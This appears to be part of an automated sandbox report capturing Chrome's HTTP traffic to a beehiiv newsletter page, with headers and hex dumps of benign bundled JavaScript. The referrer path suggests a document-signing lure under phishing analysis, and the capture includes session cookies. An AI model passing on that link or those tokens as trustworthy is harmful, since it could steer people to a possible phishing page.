                                                                                                                                            2025-01-15 18:14:34 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 33 35 37 35 32 65 32 61 2d 30 38 31 66 2d 35 64 33 35 2d 38 33 33 63 2d 66 64 63 35 32 37 65 31 32 65 64 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="35752e2a-081f-5d35-833c-fdc527e12edb")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 74 79 2d 36 30 22 2c 37 30 3a 22 6f 70 61 63 69 74 79 2d 37 30 22 2c 38 30 3a 22 6f 70 61 63 69 74 79 2d 38 30 22 2c 39 30 3a 22 6f 70 61 63 69 74 79 2d 39 30 22 2c 31 30 30 3a 22 6f 70 61 63 69 74 79 2d 31 30 30 22 7d 2c 66 3d 7b 6e 6f 6e 65 3a 22 70 2d 30 22 2c 73 6d 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 38 20 73 6d 3a 70 79 2d 38 22 2c 6d 64 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 31 36 20 73 6d 3a 70 79 2d 31 32 22 2c 6c 67 3a 22 70 2d 34 20 73 6d 3a 70 78 2d 32 34 20 73 6d 3a 70 79 2d 31 36 22 7d 2c 64 3d 7b 6e 6f 6e 65 3a 22 73 68 61 64 6f 77 2d 6e 6f 6e 65 22 2c 78 73 3a 22 73 68 61 64 6f 77 2d 78 73 22 2c 73 6d 3a 22 73 68 61 64 6f 77 2d 73 6d 22 2c 6d 64 3a 22 73 68 61 64 6f 77 2d 6d 64 22 2c 6c 67 3a 22 73 68 61 64 6f 77 2d 6c 67 22 2c 78 6c 3a 22 73
                                                                                                                                            Data Ascii: ty-60",70:"opacity-70",80:"opacity-80",90:"opacity-90",100:"opacity-100"},f={none:"p-0",sm:"p-4 sm:px-8 sm:py-8",md:"p-4 sm:px-16 sm:py-12",lg:"p-4 sm:px-24 sm:py-16"},d={none:"shadow-none",xs:"shadow-xs",sm:"shadow-sm",md:"shadow-md",lg:"shadow-lg",xl:"s
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 70 72 69 6d 61 72 79 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 70 72 69 6d 61 72 79 5f 73 68 61 64 6f 77 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 74 65 78 74 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 62 75 74 74 6f 6e 5f 73 65 63 6f 6e 64 61 72 79 5f 62 6f 72 64 65 72 5f 63 6f 6c 6f 72 3a 22 22 2c 6e 61 76 62 61 72 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 5f 64 65 73 6b 74 6f 70 5f 65 6e 61 62 6c 65 64 3a 21 30 2c 6e 61 76 62 61 72 5f 62 75
                                                                                                                                            Data Ascii: _text_color:"",navbar_button_primary_border_color:"",navbar_button_primary_shadow:"",navbar_button_secondary_background_color:"",navbar_button_secondary_text_color:"",navbar_button_secondary_border_color:"",navbar_login_button_desktop_enabled:!0,navbar_bu
                                                                                                                                            2025-01-15 18:14:34 UTC502INData Raw: 7d 2c 69 73 45 6e 61 62 6c 65 64 3a 21 31 7d 29 3b 5f 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 57 65 62 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 3b 63 6f 6e 73 74 20 77 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 77 65 62 54 68 65 6d 65 3a 6f 2c 69 73 45 6e 61 62 6c 65 64 3a 74 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 72 61 64 69 75 73 43 6c 61 73 73 3a 73 2c 73 68 61 64 6f 77 43 6c 61 73 73 3a 61 7d 3d 72 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 28 7b 73 68 61 64 6f 77 43 6c 61 73 73 3a 64 5b 6f 3f 2e 73 68 61 64 6f 77 7c 7c 22 6e 6f 6e 65 22 5d 2c 72 61 64 69 75 73 43 6c 61 73 73 3a 62 5b 6f 3f 2e 72 61 64 69 75 73 7c 7c 22 6e 6f 6e 65 22 5d 7d 29 2c 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 73 78 28 5f 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7b 77 65
                                                                                                                                            Data Ascii: },isEnabled:!1});_.displayName="WebThemeContext";const w=({children:e,webTheme:o,isEnabled:t})=>{const{radiusClass:s,shadowClass:a}=r.useMemo(()=>({shadowClass:d[o?.shadow||"none"],radiusClass:b[o?.radius||"none"]}),[o]);return n.jsx(_.Provider,{value:{we


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            36192.168.2.1649753104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC843OUTGET /assets/keyboard-CaEu2o0u.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 7148
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1bec-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a1ec23c352-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 62 34 63 37 37 30 64 2d 35 39 62 66 2d 35 62 65 31 2d 61 62 37 38 2d 36 63 66 34 64 31 39 65 32 35 39 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b4c770d-59bf-5be1-ab78-6cf4d19e2599")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 22 73 79 6d 62 6f 6c 22 3f 74 2b 22 22 3a 74 2c 6e 29 2c 6e 29 3b 6c 65 74 20 78 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 77 28 74 68 69 73 2c 22 63 75 72 72 65 6e 74 22 2c 74 68 69 73 2e 64 65 74 65 63 74 28 29 29 2c 77 28 74 68 69 73 2c 22 68 61 6e 64 6f 66 66 53 74 61 74 65 22 2c 22 70 65 6e 64 69 6e 67 22 29 2c 77 28 74 68 69 73 2c 22 63 75 72 72 65 6e 74 49 64 22 2c 30 29 7d 73 65 74 28 74 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 21 3d 3d 74 26 26 28 74 68 69 73 2e 68 61 6e 64 6f 66 66 53 74 61 74 65 3d 22 70 65 6e 64 69 6e 67 22 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 49 64 3d 30 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 3d 74 29 7d 72 65 73 65 74 28 29 7b 74 68 69 73 2e 73 65 74 28 74 68 69 73 2e 64 65 74 65 63 74 28 29 29 7d 6e
                                                                                                                                            Data Ascii: "symbol"?t+"":t,n),n);let x=class{constructor(){w(this,"current",this.detect()),w(this,"handoffState","pending"),w(this,"currentId",0)}set(t){this.current!==t&&(this.handoffState="pending",this.currentId=0,this.current=t)}reset(){this.set(this.detect())}n
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2e 63 75 72 72 65 6e 74 26 26 6e 5b 30 5d 28 29 7d 29 2c 74 2e 61 64 64 28 28 29 3d 3e 7b 72 2e 63 75 72 72 65 6e 74 3d 21 31 7d 29 7d 2c 73 74 79 6c 65 28 6e 2c 72 2c 6f 29 7b 6c 65 74 20 69 3d 6e 2e 73 74 79 6c 65 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 72 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6e 2e 73 74 79 6c 65 2c 7b 5b 72 5d 3a 6f 7d 29 2c 74 68 69 73 2e 61 64 64 28 28 29 3d 3e 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6e 2e 73 74 79 6c 65 2c 7b 5b 72 5d 3a 69 7d 29 7d 29 7d 2c 67 72 6f 75 70 28 6e 29 7b 6c 65 74 20 72 3d 4c 28 29 3b 72 65 74 75 72 6e 20 6e 28 72 29 2c 74 68 69 73 2e 61 64 64 28 28 29 3d 3e 72 2e 64 69 73 70 6f 73 65 28 29 29 7d 2c 61 64 64 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 70 75
                                                                                                                                            Data Ascii: .current&&n[0]()}),t.add(()=>{r.current=!1})},style(n,r,o){let i=n.style.getPropertyValue(r);return Object.assign(n.style,{[r]:o}),this.add(()=>{Object.assign(n.style,{[r]:i})})},group(n){let r=L();return n(r),this.add(()=>r.dispose())},add(n){return e.pu
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6e 7c 7c 74 2e 63 75 72 72 65 6e 74 26 26 74 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 26 26 21 74 2e 63 75 72 72 65 6e 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 26 26 72 28 22 62 75 74 74 6f 6e 22 29 7d 2c 5b 6e 2c 74 5d 29 2c 6e 7d 6c 65 74 20 6b 3d 53 79 6d 62 6f 6c 28 29 3b 66 75 6e 63 74 69 6f 6e 20 4a 28 65 2c 74 3d 21 30 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 65 2c 7b 5b 6b 5d 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 2e 2e 2e 65 29 7b 6c 65 74 20 74 3d 61 2e 75 73 65 52 65 66 28 65 29 3b 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 74 2e 63 75 72 72 65 6e 74 3d 65 7d 2c 5b 65 5d 29 3b 6c 65 74 20 6e 3d 48 28 72 3d
                                                                                                                                            Data Ascii: n||t.current&&t.current instanceof HTMLButtonElement&&!t.current.hasAttribute("type")&&r("button")},[n,t]),n}let k=Symbol();function J(e,t=!0){return Object.assign(e,{[k]:t})}function K(...e){let t=a.useRef(e);a.useEffect(()=>{t.current=e},[e]);let n=H(r=
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 3d 3d 21 30 26 26 79 2e 70 75 73 68 28 62 29 3b 63 26 26 28 70 5b 22 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 22 5d 3d 79 2e 6a 6f 69 6e 28 22 20 22 29 29 7d 69 66 28 69 3d 3d 3d 61 2e 46 72 61 67 6d 65 6e 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 24 28 73 29 29 2e 6c 65 6e 67 74 68 3e 30 29 7b 69 66 28 21 61 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 75 29 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 26 26 75 2e 6c 65 6e 67 74 68 3e 31 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 5b 27 50 61 73 73 69 6e 67 20 70 72 6f 70 73 20 6f 6e 20 22 46 72 61 67 6d 65 6e 74 22 21 27 2c 22 22 2c 60 54 68 65 20 63 75 72 72 65 6e 74 20 63 6f 6d 70 6f 6e 65 6e 74 20 3c 24 7b 72 7d 20 2f 3e 20 69 73 20 72 65 6e 64 65 72 69 6e
                                                                                                                                            Data Ascii: ==!0&&y.push(b);c&&(p["data-headlessui-state"]=y.join(" "))}if(i===a.Fragment&&Object.keys($(s)).length>0){if(!a.isValidElement(u)||Array.isArray(u)&&u.length>1)throw new Error(['Passing props on "Fragment"!',"",`The current component <${r} /> is renderin
                                                                                                                                            2025-01-15 18:14:34 UTC1216INData Raw: 6f 66 20 65 29 66 6f 72 28 6c 65 74 20 6f 20 69 6e 20 72 29 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 6f 6e 22 29 26 26 74 79 70 65 6f 66 20 72 5b 6f 5d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 28 6e 5b 6f 5d 21 3d 6e 75 6c 6c 7c 7c 28 6e 5b 6f 5d 3d 5b 5d 29 2c 6e 5b 6f 5d 2e 70 75 73 68 28 72 5b 6f 5d 29 29 3a 74 5b 6f 5d 3d 72 5b 6f 5d 3b 69 66 28 74 2e 64 69 73 61 62 6c 65 64 7c 7c 74 5b 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 5d 29 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 6d 61 70 28 72 3d 3e 5b 72 2c 76 6f 69 64 20 30 5d 29 29 29 3b 66 6f 72 28 6c 65 74 20 72 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28
                                                                                                                                            Data Ascii: of e)for(let o in r)o.startsWith("on")&&typeof r[o]=="function"?(n[o]!=null||(n[o]=[]),n[o].push(r[o])):t[o]=r[o];if(t.disabled||t["aria-disabled"])return Object.assign(t,Object.fromEntries(Object.keys(n).map(r=>[r,void 0])));for(let r in n)Object.assign(


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            37192.168.2.1649754104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC550OUTGET /assets/index-BdpAPpdN.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1959
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7a7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a218864245-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 35 33 35 62 32 38 30 2d 33 36 62 64 2d 35 64 61 35 2d 39 33 64 33 2d 34 35 66 61 38 32 30 34 32 32 34 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0535b280-36bd-5da5-93d3-45fa82042241")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6c 65 22 26 26 22 77 74 2d 68 65 61 64 65 72 2d 66 6f 6e 74 22 2c 6c 3d 3d 3d 22 62 6f 64 79 22 26 26 22 77 74 2d 62 6f 64 79 2d 66 6f 6e 74 22 2c 65 3d 3d 3d 22 63 6f 6e 74 65 6e 74 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 22 26 26 22 74 65 78 74 2d 77 74 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 2d 62 6f 74 74 6f 6d 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22 73 75 62 73 63 72 69 62 65 22 26 26 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 22 2c 65 3d 3d 3d 22
                                                                                                                                            Data Ascii: le"&&"wt-header-font",l==="body"&&"wt-body-font",e==="content"&&"text-wt-text-on-background",e==="subscribe-gate"&&"text-wt-background",e==="subscribe-gate-bottom"&&"text-wt-text-on-background",e==="subscribe"&&"text-wt-text-on-subscribe-background",e==="
                                                                                                                                            2025-01-15 18:14:34 UTC118INData Raw: 65 6e 3a 74 7d 29 7d 7d 3b 65 78 70 6f 72 74 7b 62 20 61 73 20 54 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 30 35 33 35 62 32 38 30 2d 33 36 62 64 2d 35 64 61 35 2d 39 33 64 33 2d 34 35 66 61 38 32 30 34 32 32 34 31 0a
                                                                                                                                            Data Ascii: en:t})}};export{b as T};//# sourceMappingURL=index-BdpAPpdN.js.map//# debugId=0535b280-36bd-5da5-93d3-45fa82042241


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            38192.168.2.1649751146.75.120.1574436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC818OUTGET /widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com HTTP/1.1
                                                                                                                                            Host: platform.twitter.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:34 UTC608INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 327164
                                                                                                                                            Last-Modified: Mon, 11 Dec 2023 17:19:49 GMT
                                                                                                                                            ETag: "81267302efdfb3e4524a22631a8fc99e"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            Cache-Control: public, max-age=315360000
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            X-Served-By: cache-iad-kiad7000164-IAD, cache-fra-etou8220067-FRA
                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            TW-CDN: FT
                                                                                                                                            2025-01-15 18:14:34 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 74 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 77 69 74 74 65 72 20 57 69 64 67 65 74 20 49 66 72 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 29 7b 46 75 6e 63 74 69 6f 6e 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 26 26 28 2f 28 4d 53 49 45 20 28 5b 36 37 38 39 5d 7c 31 30 7c 31 31 29 29 7c 54 72 69 64 65 6e 74 2f 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76
                                                                                                                                            Data Ascii: <!DOCTYPE HTML><meta chartset="utf-8"><title>Twitter Widget Iframe</title><body><script type="text/javascript">!function(){Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||function(e){v
